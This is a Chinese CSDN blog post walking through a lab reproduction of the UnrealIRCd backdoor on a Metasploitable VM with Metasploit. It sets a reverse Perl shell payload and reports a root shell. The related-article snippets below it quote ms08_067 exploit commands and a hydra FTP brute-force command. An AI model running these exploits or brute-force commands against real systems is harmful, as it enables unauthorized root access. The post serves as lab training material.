避坑版UnreallRCd后门漏洞复现

于 2023-07-17 10:17:15 发布
阅读量401 收藏 6
点赞数 1
文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69925635/article/details/131760526
版权

在使用openvas对meta虚拟机进行漏洞测试时,发现高危漏洞

 是一个CVSS:7.5的后门,现尝试实现

攻击机:kali linux ip:192.168.204.128

靶机:Metasploittable ip:192.168.204.130

首先在kali中启动msfconsole

 搜索漏洞库

 使用漏洞(这里也可以直接输入use 2)

 设置参数

 通过set RHOST命令锁定靶机IP

 这里直接run的话会报错:A payload has not been selected

Exploit completed,but no session was created.

 经过多次尝试找到错误原因,这里我们手动设置payload

set payload cmd/unix/reverse_perl

 再设置LHost

 最后run,显示成功连接,输入whoami,显示root

 后门实现完成

凝弈ny
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pangolin去后门修改.zip
01-06
pangolin去后门修改.zip
渗透测试实例--Metasploitable2靶机
lxy123_com的博客
02-01 4010
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台 实验目的: 实验步骤:
关于使用Metasploit中出现Exploit completed, but no session was created的解决办法
热门推荐
qq_42430737的博客
06-14 3万+
最近准备学习有关渗透测试方面的内容,记录一些自己遇见的问题与解决方法,大佬勿喷。 我在做第一个实验:利用ms08-067入侵靶机,获取控制权时,就遇见了下面这个问题: Exploit completed, but no session was created 我先把我的命令行加上: msf5 > use /windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > set RhOSTS 192.168.0.106
exploit completed, but no session was created
gRpc的博客
08-24 3604
metasploit
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Metasploitable2靶机渗透
耿先生的博客
02-06 4364
*Metasploitable2靶机渗透* *Metasploitable2介绍* ​ Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。本2已经可以下载,并且比上一个本包含更多可利用的安全漏洞。这个本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 *进行此次靶机练习的原因* ​
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1203
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
phpstudy(后门).7z
06-03
phpstudy后门,可用于后门测试
快速开发NFine框架(去后门本)
01-30
NFine去后门和数据库说明,节约程序员时间,去除60%业务代码编写。 快速开发NFine框架 去除后门隐患,开发迅速、代码量少、学习简单、功能强大、轻量级、易扩展,让Web开发更迅速、简单。
phpstudy2018(后门).rar
01-05
phpstudy2018后门本下载
phpMyAdmin通过密码漏洞后门文件
10-17
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
【RABBITMQ】rabbitmq 产生的问题
Zsigner的博客
02-21 410
个人实践: 1、无法引入Could not transfer artifactspring-boot-starter-amqp 解决:指定parant 本号,不指定amqp本号就可以了 <parent> <groupId>org.springframework.boot</groupId> <artifa...
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4468
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 5681
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7176
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
metasploitable2渗透测试
qq_57976347的博客
06-06 1186
一、系统弱密码登录 1、在kali上执行命令行telnet 192.168.26.129 2、Login和password都输入msfadmin 3、登录成功,进入系统 4、测试如下: 二、MySQL弱密码登录: 1、在kali上执行mysql –h 192.168.26.129 –u root 2、登录成功,进入MySQL系统 3、测试效果: 三、PostgreSQL弱密码登录 1、在Kali上执行psql -h 192.168.26.129 –U post...
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 967
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
meterpreter详解与渗透实战
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
第三章-4 Metasploit漏洞利用模块
划水的小白白
05-13 605
每日一句: 如何一别朱仙镇,不见将军奏凯歌。 ——于谦《岳忠武王祠》 本文内容: ~快速搭建有限制的测试环境 ~实战漏洞利用 ~MSF会话常用命令 ~其他问题补充 一、快速搭建有限制的测试环境 问:搭建测试环境的作用是什么? 答:在本地测试漏洞,然后授权的情况下进行相关漏洞挖掘 0,安装虚拟机,win server2008 1,安装phpstudy ~百度,PHP study,进官网直接下载就行 ~安装PHP study可能需要一些环
phpstudy后门漏洞复现
最新发布
09-06
根据引用中的信息,实际测试发现phpstudy2016PHP5.4、phpstudy2018php-5.2.17和php-5.4.45均存在后门漏洞。 根据引用中的信息,后门代码存在于\ext\php_xmlrpc.dll模块中。通过使用notepad打开该文件并搜索@...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值